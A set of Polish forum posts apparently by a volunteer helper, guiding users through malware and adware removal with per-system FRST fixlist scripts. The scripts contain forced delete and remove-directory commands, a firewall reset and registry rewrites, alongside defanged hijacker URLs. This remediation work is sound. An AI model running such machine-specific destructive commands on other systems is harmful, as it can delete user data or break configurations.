picasso

Mam nadzieję, że przekopiowałeś dane z tego "bezimiennego", gdyż w Fixlog potwierdzenie tego co mówiłam (przesunięcie danych użytkownika przez infekcję). WindowsServices zawiera tylko pliki infekcji, więc poczęstuj go przez SHIFT+DEL. System Volume Information to folder Przywracania systemu tworzony przez Windows na każdym dostępnym dysku, w tym niestety i na pendrive, czyli w tym konkretnym wypadku można go usunąć, ale nie ruszaj tego folderu na dyskach twardych. Sprawa pendrive rozwiązana. Natomiast w raporcie FRST Addition był także ten odczyt zawiadamiający o niesprecyzowanej usterce WMI Windows: ==================== Punkty Przywracania systemu ========================= Sprawdź usługę "winmgmt" lub napraw WMI. ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Niepowodzenie przy listowaniu urządzeń. Sprawdź usługę "winmgmt" lub napraw WMI. Dostarcz log z narzędzia WMI Diagnosis Utility.

Możesz jeszcze spróbować wykonać punkty 4 i 5 z tych instrukcji: KLIK. W punkcie 5 jest błąd, komenda musi być ujęta w cudzysłów. Ponadto ścieżka dla nowszej wersji jest inna, tzn.: cd "C:\Program Files\Microsoft Security Client"

Limit poczty o2 to jakoby 100MB, ale otrzymujesz komunikat o2 od serwera Google kierujący z kolei do artykułu mówiącego o innym progu oraz wspominającego o limitach poczty odbiorcy: Nic tu więcej nie wymyślę, plik zdaje się być po prostu za duży. Skompresuj go do ZIP lub prześlij inną metodą... Jeśli rzecz o pobocznych akcjach, prawie wszystko wykonane, ale wymagane poprawki na szczątki po niedokładnie odinstalowanych programach: 1. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście wpis RealUpgrade 1.1 > Dalej. 2. Otwórz Notatnik i wklej w nim: (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1080592 2016-05-18] (AVG Technologies CZ, s.r.o.) Task: {16A311F1-2103-43F4-BAA0-E80044EBFA39} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-3135212574-2383626176-3544364843-1005 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-15] (RealNetworks, Inc.) Task: {666C37AB-D394-4FAF-844E-7710C191787D} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-3135212574-2383626176-3544364843-1005 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-15] (RealNetworks, Inc.) Task: {6948D089-B42A-49CD-8A40-974647918432} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-3135212574-2383626176-3544364843-1002 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-15] (RealNetworks, Inc.) Task: {8808D641-BBF5-4C99-B665-D9ACA8335ADD} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-3135212574-2383626176-3544364843-1002 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-15] (RealNetworks, Inc.) Task: {95AE3F04-0992-4016-B6CF-B4F4824ECE2F} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-06-04] (AVAST Software) ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Brak pliku S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /ve /t REG_SZ /d Bing /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v URL /t REG_SZ /d "http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v DisplayName /t REG_SZ /d "@ieframe.dll,-12512" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /ve /t REG_SZ /d Bing /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v URL /t REG_SZ /d "http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v DisplayName /t REG_SZ /d "@ieframe.dll,-12512" /f C:\Program Files\Common Files\AV\avast! Antivirus C:\Program Files (x86)\AVG C:\Program Files (x86)\Real C:\ProgramData\AVAST Software C:\ProgramData\Avg C:\ProgramData\MFAData C:\ProgramData\Real C:\Users\Inga\AppData\Local\AvgSetupLog C:\Users\Inga\AppData\Local\Avg C:\Users\Inga\AppData\Local\Mozilla C:\Users\Inga\AppData\Roaming\AVG C:\Users\Inga\AppData\Roaming\Real Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

1. Jedna komenda się nie wykonała, "zjadło" mi zamknięcie. Otwórz Notatnik i wklej w nim: CMD: type "C:\Users\Michał\AppData\Local\Google\Chrome\User Data\Local State" DeleteQuarantine: Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Uruchom AdwCleaner ponownie. Po kolei wybierz opcje Skanuj + Usuń. Przedstaw log z czyszczenia.

Nagraj log w Process Monitor co się dzieje podczas restartu systemu. Usuń za pomocą AdwCleaner ten wpis. Następnie uruchom program Process Monitor, Options > Enable Boot Logging, restart systemu, otwórz Process Monitor który poprosi o zapis raportu. Plik *.PML spakuj do ZIP i shostuj gdzieś podając link.

1. Ze zmęczenia przeoczyłam jeden aktywny wpis malware (Sathurbot). Poprawka. Do Notatnika wklej: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2016-05-28] () RemoveDirectory: C:\ProgramData\Microsoft\Performance RemoveDirectory: C:\Users\Pawcio\Desktop\Nowy folder (6)\hmm\FRST-OlderVersion Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Przedstaw wynikowy fixlog.txt. 2. Pozostałe wyniki z Hitman: steam_api.dll owszem wygląda na fałszywy alarm, ale za resztę nie dam głowy.

Ten plik Fixlist bardzo dziwnie zrobiłeś w Notatniku. Proszę otwórz go i porównaj z moim postem. Skopane wszystkie przejścia do nowej linii. Plik zapisałeś też w innym kodowaniu, tzn. ANSI, FRST zawsze tworzy raporty w UTF-8. Podobny temat: KLIK. FRST działa w piaskownicy COMODO, co jest tu wysoce niepożądane, gdyż COMODO blokuje operacje modyfikacji. Skan FRST też wykonany z poziomu piaskownicy, stąd w logu "dziwne" rzeczy (np. ten komunikat o blokadzie BFE jest stąd, że COMODO ogranicza dostęp FRST). Chrome ma nadal zainfekowane preferencje. Jakie? Nadal widzę w rejestrze ustawioną ścieżkę na folder Mozilla (już usunięty). Poprawki: 1. FRST nie może działać w piaskownicy COMODO, COMODO należy też wyłączyć na czas operacji. Otwórz Notatnik i wklej w nim: Task: {489532A2-10BE-4A36-965B-C42C6AE1D997} - System32\Tasks\{2E0B05CB-3F30-4CD8-9A85-7AB53AE02B41} => pcalua.exe -a "C:\Program Files (x86)\MPC Cleaner\Uninstall.exe" -d "C:\Program Files (x86)\MPC Cleaner\" U1 MPCKpt; system32\DRIVERS\MPCKpt.sys [X] SearchScopes: HKLM-x32 -> ielnksrch URL = CHR HomePage: Default -> hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWuxkYK9BNIFBtjHULyvx2bbu3VEcJyNvKmfaA2dzwXXqtrOrBN35fShntC4jzPZEJ23yv8h1--wXhl8vMo6SLA8JugFMkhH0U9ZdEAJ70mzWHWzQB3OO3c_1wbVs2lor72zakKWYbsPCkmkE51s95scSz9f9mXiA0CAdZ0bEG CHR StartupUrls: Default -> "hxxp://onet.pl/","hxxp://parkiet.com.pl/","hxxp://wyborcza.pl/","hxxp://stooq.pl/","hxxp://bossafx.pl/","hxxp://bieganie.pl/","search.mpc.am" CHR DefaultSearchURL: Default -> hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWuxkYK9BNIFBtjHULyvx2bbu3VEcJyNvKmfaA2dzwXXqtrOrBN35fShntC4jzPZEJ23yv8h1--wXhl8vA_vatMGgP0viSHqT9WlrpALt36CHU0UODergacZgjTrHPDIEjwIHEOVcgIeIONiLxKeDO2oymPSDZrfUWjlMlDSg3&q={searchTerms} CHR DefaultSearchKeyword: Default -> feed.sonic-search.com CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command={searchTerms} Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /ve /t REG_SZ /d Bing /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v URL /t REG_SZ /d "http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v DisplayName /t REG_SZ /d "@ieframe.dll,-12512" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /ve /t REG_SZ /d Bing /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v URL /t REG_SZ /d "http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v DisplayName /t REG_SZ /d "@ieframe.dll,-12512" /f Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Powtórz tę operację:

Aktualizacje Windows należy wykonać w sposób kompletny przed podjęciem innych działań. Wśród łat mogą być np. takie, które usprawniają działanie. Tu pełny stan aktualizacji Windows nieznany. Pomijając już punktowany stan IE8, widać tylko pakiet SP1, co w ogóle nie jest dowodem że system jest aktualny. Pakiet SP1 został wydany w roku 2011, od tego czasu z kilkaset łat wydano, czy są zaintalowane jest nie do sprawdzenia za pomocą raportu FRST, ani innych prostych metod.

Wszystko zrobione. Poprawki: 1. Wyczyść foldery Przywracania systemu: KLIK. 2. Otwórz Notatnik i wklej w nim: CreateRestorePoint: HKLM-x32\...\RunOnce: [unKIS] => wscript.exe //b C:\Users\Pawcio\AppData\Local\Temp\UnKIS.vbs R4 KAVRemvr; C:\Users\Pawcio\AppData\Local\Temp\{F4E006CA-FDC0-48FA-B340-F584297F2573}\kavremover.exe [9231432 2016-06-07] (Kaspersky Lab ZAO) CHR HKLM-x32\...\Chrome\Extension: [dhigneefebkcagnpnpbibganpmfgebnk] - hxxps://clients2.google.com/service/update2/crx S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [19984 2015-12-16] () R4 cm_km; system32\DRIVERS\cm_km.sys [X] R4 kl1; system32\DRIVERS\kl1.sys [X] R4 klbackupdisk; system32\DRIVERS\klbackupdisk.sys [X] R4 klbackupflt; system32\DRIVERS\klbackupflt.sys [X] R4 kldisk; system32\DRIVERS\kldisk.sys [X] R4 klflt; system32\DRIVERS\klflt.sys [X] R4 KLIF; system32\DRIVERS\klif.sys [X] U4 klkbdflt2; system32\DRIVERS\klkbdflt2.sys [X] R4 klpd; system32\DRIVERS\klpd.sys [X] R4 kltdi; system32\DRIVERS\kltdi.sys [X] R4 kneps; system32\DRIVERS\kneps.sys [X] RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Pawcio\AppData\Local\Temp\{F4E006CA-FDC0-48FA-B340-F584297F2573} CMD: del /q C:\DelFix.txt CMD: del /q C:\Users\Pawcio\Desktop\DungeonRift.lnk CMD: del /q C:\Windows\Minidump\*.dmp CMD: del /q C:\Windows\System32\DRIVERS\EsgScanner.sys CMD: netsh advfirewall reset Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 3. Przeprowadź skanowanie za pomocą Hitman Pro. Dostarcz log, o ile wykryje coś innego niż plik FRST64.exe (fałszywy alarm).

Zewnętrzny dysk nie ma tu nic do rzeczy, to nie ten rodzaj infekcji. I powtarzamy kroki usuwające, czyli wykonaj ponownie instrukcje podane w moim pierwszym poście #3. Jak mówię, GMER omiń.

Niestety to oznacza, że odwróciłeś wszystkie moje akcje usuwające i przywróciłeś infekcję. Robota od początku, czyli nowe logi FRST dostacz (wszystkie trzy). GMER na razie pomiń.

A dlaczego pominąć? Przecież to pusty skrót w menu kontekstowym "Wyślij do": Shortcut: C:\Users\Pawcio\AppData\Roaming\Microsoft\Windows\SendTo\Gry.lnk -> C:\Users\Pawcio\Desktop\Gry (Brak pliku)

Camilo, następnym razem proszę się wypowiadać konkretnie gdzie widzisz dany obiekt. Tekst "Na liście użytkowników oprócz admina znalazłem użytkownika o nazwie Root z prawami Administracja" będzie przez wielu przeczytany, że chodzi o konto w Windows i tak wszyscy obecni tu w temacie to zinterpretowali. A tu się okazuje, że chodzi o konto na poziomie routera. I konto Root w Liveboxie jest standardowym kontem: ftp://tplink-forum.pl/ISP/Orange/Livebox%201.0/LIVEBOX%20odzyskanie%20zagubionego%20hasla%20do%20panelu%20konfiguracji%20LiveBox.pdf PS. Fix FRST wykonany. Zastosuj DelFix.

W FRST można wykryć tylko niektóre cracki poprzez pośrednie znaki. Tu nie ma żadnych pośrednich znaków, co nie jest żadnym dowodem że Windows nie jest scrackowany. Czy pytanie ma jakieś szczególne podłoże? Windows Update jest priorytetowe.

Wszystko pomyślnie usunięte. Drobna poprawka na szczątki po SpyHunter i puste skróty. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com\Baldur's Gate - Enhanced Edition\Documents RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epistory - Typing Chronicles RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shadowrun Returns RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SpyHunter4 RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WolfTeam-US S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [19984 2015-12-16] () CMD: del /q "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo II\Lord of Destruction Czytaj to.lnk" CMD: del /q "C:\Users\Pawcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\SpyHunter4.lnk" CMD: del /q "C:\Users\Pawcio\AppData\Roaming\Microsoft\Windows\SendTo\Gry.lnk" CMD: del /q "C:\Users\Pawcio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MEGAsync\MEGA Website.lnk" CMD: del /q "C:\Users\Pawcio\Desktop\DungeonRift.lnk CMD: del /q C:\Windows\System32\DRIVERS\EsgScanner.sys Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

Większość usunięta, ale wskoczył niestety nowy obiekt "Adskip". Kolejne poprawki: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1421970685-546915502-2319007883-1001\...\Run: [Akamai NetSession Interface] => "C:\Users\Michał\AppData\Local\Akamai\netsession_win.exe" R2 ADSkipSvc; C:\Program Files (x86)\ADSKIP\ADSkipSvc.exe [129144 2016-05-11] () S2 pihetefizbt; C:\Program Files (x86)\00000000-1465050606-0000-0000-D43D7EEF6E46\knspE2F1.tmp [X] S3 blNetFilter; \??\C:\WINDOWS\system32\drivers\blNetFilter.sys [X] S1 MPCKpt; system32\DRIVERS\MPCKpt.sys [X] C:\Program Files (x86)\ADSKIP C:\Users\Michał\AppData\Local\Google\Chrome\User Data\ChromeDefaultData C:\Users\Michał\AppData\Roaming\ADSKIP C:\Users\Michał\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AdSkip C:\WINDOWS\system32\Drivers\askProtect64.sys C:\WINDOWS\SysWOW64\vns1BCB.tmp CMD: type C:\Users\Michał\AppData\Local\Google\Chrome\User Data\Local State" EmptyTemp: Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Przedstaw wynikowy fixlog.txt. 2. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

To raporty zrobione najwyraźniej po usunięciu tego konta "Root", gdyż nie figuruje ono w spisie kont lokalnych. Nie jestem w stanie nic więcej powiedzieć, skoro nie ma żadnych danych o tym usuniętym koncie, nie wiadomo też jakie było jego źródło. A w raportach nie ma oznak infekcji. PS. Do usunięcia tylko mini-odpadki po niepożądanej aplikacji FileViewPro oraz kilka pustych wpisów. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM-x32\...\Run: [updReg] => C:\Windows\UpdReg.EXE HKU\S-1-5-21-3097542305-1105438724-2829177874-1001\...\Run: [TobiiWindowsControl] => C:\Program Files (x86)\Tobii\Gaze Interaction\TobiiEyeControlOptions.exe -AutoStartWindowsControl CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChromeSp.crx [2016-04-20] S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X] C:\Spacekace C:\Users\Camilo\AppData\Local\FileViewPro EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.

Fix FRST nie został wykonany. Otwórz plik Fixlog, jest całkowicie pusty (nie zapisała się zawartość w Notatniku). Powtarzaj punkty 2 i 4. Czy za każdym razem w nieudanym podejściu próbujesz wysłać identyczny plik docx, czy też w tych udanych podejściach były jednak inne pliki? I proponuję skontaktować się bezpośrednio z obsługą techniczną poczty. Pliki desktop.ini na Pulpicie były od zawsze: Natomiast pliki z dolarami w nazwie to spodziewane kopie tymczasowe tworzone przez Word: KLIK. Owner File (Same Directory as Source File) When a previously saved file is opened for editing, for printing, or for review, Word creates a temporary file that has a .doc file name extension. This file name extension begins with a tilde (~) that is followed by a dollar sign ($) that is followed by the remainder of the original file name. This temporary file holds the logon name of person who opens the file. This temporary file is called the "owner file." Obiekty znikną z widoku po zaznaczeniu następujących opcji w Opcjach folderów: Ukryj rozszerzenia znanych typów plików + Ukryj chronione pliki systemu operacyjnego.

Czyli problem występuje po zaznaczeniu opcji "Bez serwera proxy"? Czy program CyberGhost 5 jest aktywny w momencie próby połączenia? Fix FRST uruchomiłeś aż dwa razy, to Fix jednorazowego użytku. Niemniej w pierwszym podejściu wykonał co należy. Jeszcze doczyszczanie odpadków po odinstalowanych programach IObit. Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-3828751075-1785391660-3400717403-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yandex.ru/?win=212&clid=2100767-002 SearchScopes: HKU\S-1-5-21-3828751075-1785391660-3400717403-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=212&clid=2100768-002&text={searchTerms} SearchScopes: HKU\S-1-5-21-3828751075-1785391660-3400717403-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=212&clid=2100768-002&text={searchTerms} Task: {450ABECF-19B1-4943-8041-5BE3F38ADA17} - System32\Tasks\Driver Booster SkipUAC (kkomo) => D:\Program Files (x86)\Iobit\Driver Booster\DriverBooster.exe Task: {CFBF3DD2-C1AA-475B-B5E1-FE881A4BB9C1} - System32\Tasks\Driver Booster SkipUAC (KK) => D:\Program Files (x86)\Iobit\Driver Booster\DriverBooster.exe Task: {E20883A0-1975-40DA-AAF7-5E8B5304ABB6} - System32\Tasks\Driver Booster Scheduler => D:\Program Files (x86)\Iobit\Driver Booster\Scheduler.exe S3 IMFFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\IMFFilter.sys [22208 2016-03-31] (IObit) S3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [34848 2016-03-31] (IObit.com) C:\Program Files (x86)\IObit\IObit Malware Fighter C:\ProgramData\Komputronik\01.(AUDIT)_start-WDS.lnk C:\ProgramData\Komputronik\xxx_10.28.64.199.lnk C:\Users\Instalator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk C:\Users\kkomo\Desktop\Programy\Driver Booster 3.lnk C:\WINDOWS\ZAM.krnl.trace C:\WINDOWS\ZAM_Guard.krnl.trace Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie powinno być restartu. Przedstaw wynikowy fixlog.txt. Mam też dodatkowe pytanie, czy ten program został już odinstalowany: HKU\S-1-5-18\...\Run: [bandwidth Monitor Pro] => D:\Program Files (x86)\Bandwidth Monitor Pro\Bandwidth Monitor Pro.exe [225280 2005-02-09] (Pro²soft)?

Zabrakło trzeciego obowiązkowego raportu FRST Shortcut. W systemie jest ustawione proxy w3cache.pl: ProxyEnable: [s-1-5-21-3828751075-1785391660-3400717403-1002] => Proxy [funkcja włączona] ProxyServer: [s-1-5-21-3828751075-1785391660-3400717403-1002] => w3cache.pl:8080 ManualProxies: 1w3cache.pl:8080 Poza tym, niepoprawnie odinstalowane programy IObit Malware Fighter i Zemana. Działania do przeprowadzenia: 1. Deinstalacje: - Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj zbędne programy AliIM Plugins for Browser, Driver Booster wersja 3.1.0.365, Surfing Protection. - Wejdź do folderu C:\Program Files (x86)\IObit\IObit Malware Fighter i sprawdź czy jest jakiś plik deinstalatora. Jeśli tak, z prawokliku "Uruchom jako administrator". 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {66538CCA-E71B-4037-B06A-04F8825E0FA1} - \task Update -> Brak pliku HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-3828751075-1785391660-3400717403-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yandex.ru/?win=212&clid=2100767-002 SearchScopes: HKU\S-1-5-21-3828751075-1785391660-3400717403-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=212&clid=2100768-002&text={searchTerms} SearchScopes: HKU\S-1-5-21-3828751075-1785391660-3400717403-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=212&clid=2100768-002&text={searchTerms} Edge HomeButtonPage: HKU\S-1-5-21-3828751075-1785391660-3400717403-1002 -> hxxp://www.yandex.ru/?win=212&clid=2100767-002 OPR StartupUrls: "hxxp://www.yandex.ru/?win=212&clid=2100767-002" GroupPolicy: Ograniczenia - Chrome FF NetworkProxy: "type", 0 FF Plugin-x32: @alibaba.com/nptrademanager;version=1.0 -> C:\Users\kkomo\AppData\Local\Temp\..\application data\nptrademanager\nptrademanager.dll [2012-05-31] ( ) ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => Brak pliku ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => Brak pliku ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => Brak pliku ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => Brak pliku ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => Brak pliku R1 ZAM; C:\WINDOWS\System32\drivers\zam64.sys [202144 2016-03-14] (Zemana Ltd.) R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [202144 2016-03-14] (Zemana Ltd.) S1 networx; system32\drivers\networx.sys [X] DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google AlternateDataStreams: C:\Windows:{4B9A1497-0817-47C4-9612-D6A1C53ACF57} [26] C:\ProgramData\{BE2ACE5C-32B7-4777-9BDF-ECF87CDAB705} C:\Users\kkomo\AppData\Local\Google C:\Users\kkomo\AppData\Roaming\GSA Search Engine Ranker C:\WINDOWS\System32\drivers\zam64.sys C:\WINDOWS\System32\drivers\zamguard64.sys RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), z zaległym Shortcut. Dołącz też plik fixlog.txt.

Temat przenoszę do działu diagnostyki malware. Proszę o dostarczenie obowiązkowych raportów z FRST i GMER.

Nie podany system operacyjny. Otwórz linię komend cmd. Następnie otwórz Menedżer zadań i zabij proces explorer.exe. W linii komend wpisz polecenie i ENTER: rd /s /q "Ścieżka dostępu do folderu" Jeśli to zawiedzie, podam inny sposób przy udziale narzędzia zewnętrznego.

Przekieruję z powrotem Pulpit na C, ale zanim do tego przejdę mam dodatkowe pytanie. Jest tu znacznie więcej przekierowanych ścieżek na D: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders My Video REG_SZ D:\Diana\Videos My Pictures REG_SZ D:\Diana\Pictures Desktop REG_SZ D:\Diana\Desktop Favorites REG_SZ D:\Diana\Favorites My Music REG_SZ D:\Diana\Music {7D1D3A04-DEBB-4115-95CF-2F29DA2920DA} REG_SZ D:\Diana\Searches {374DE290-123F-4565-9164-39C4925E467B} REG_SZ D:\Diana\Downloads {BFB9D5E0-C6A9-404C-B2B2-AE6DB6AF4968} REG_SZ D:\Diana\Pictures\Links {4C5C32FF-BB9D-43B0-B5B4-2D72E54EAAA4} REG_SZ D:\Diana\Saved Games Czy to także niechciane zmiany?

